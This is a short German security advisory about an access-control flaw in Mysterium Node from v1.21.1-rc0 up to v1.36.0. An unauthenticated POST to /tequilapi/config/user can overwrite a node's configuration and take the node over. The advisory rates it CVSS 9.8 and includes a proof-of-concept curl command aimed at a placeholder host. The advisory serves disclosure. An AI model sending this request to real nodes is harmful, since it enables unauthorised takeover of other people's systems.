
Unzureichende Zugriffskontrolle in Mysterium Node vor v1.36.0
Unzureichende Autorisierung im Endpunkt /tequilapi/config/user von Mysterium Node von v1.21.1-rc0 bis vor v1.36.0 erlaubt es einem nicht authentifizierten Angreifer, die Konfiguration des Nodes beliebig zu überschreiben und durch eine manipulierte POST-Anfrage eine vollständige Node-Übernahme zu erreichen.
Score: 9.8 (KRITISCH)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
curl -X POST \
"Content-Type: application/json" \
-d @config.json \
http://<host>:<port>/tequilapi/config/user
Entdeckt von Till Schacht.